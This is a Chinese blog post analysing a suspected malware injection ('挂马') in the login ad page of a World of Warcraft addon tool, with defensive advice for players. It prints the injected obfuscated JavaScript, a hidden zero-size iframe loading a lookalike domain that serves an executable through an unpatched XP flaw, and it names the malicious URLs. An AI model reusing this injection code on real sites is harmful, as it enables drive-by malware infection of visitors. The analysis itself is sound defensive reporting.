魔兽世界大脚插件9月3日凌晨1点，疑似被挂马。
由于大脚插件登录界面内含有广告页面，黑客利用这一点实施挂马行为。
分析:
大脚打开的页面 默认打开广告页面的连接: http://wow.178.com/s/zt/dajiao2.html
代码里的内容吧 [ http://market.178.com/C/33876467888.js ]




挂马地址 hxxp://market.178.com/C/count.html 这里嵌套了一个flash跳转到地址
var NewWords; NewWords = unescape("%3Ciframe%20width%3D%270%0A%27%20height%3D%270%27%20%0Asrc%3D%27http%3A//pic.0fcard.com/ddtx/do/173984021.htm%27%3E%3C/iframe%3E");document.write(NewWords);

这里的0fcard.com 不是殴飞点卡网站 是o 而不是0（零） 专门来混淆玩家的 。
下载执行 hxxp://pic.0fcard.com/ddtx/do/gewsfe.exe
如果你的xp没有打过mpeg漏洞补丁将会自动下载。


Virustotal可疑文件分析服务表明这病毒NOD以及瑞星暂时还未能查出。

此次事件，由于大脚178网站采用双线建站，出现问题的是 网通用户 http://market.178.com指向123.134.67.166，电信用户不受影响。

在此建议大家如还想继续使用大脚插件，应该加倍注意，尽量不要用大脚来登录游戏，也不要追新通常不是大版本更新魔兽世界插件是不用每天更新，同时经常更新你的杀毒软件更新你系统漏洞是必须的。详细参阅我之前的文章， [如何安全使用魔兽世界大脚插件]

转载请保留本文链接地址:[http://www.oodd.net/post/670.html]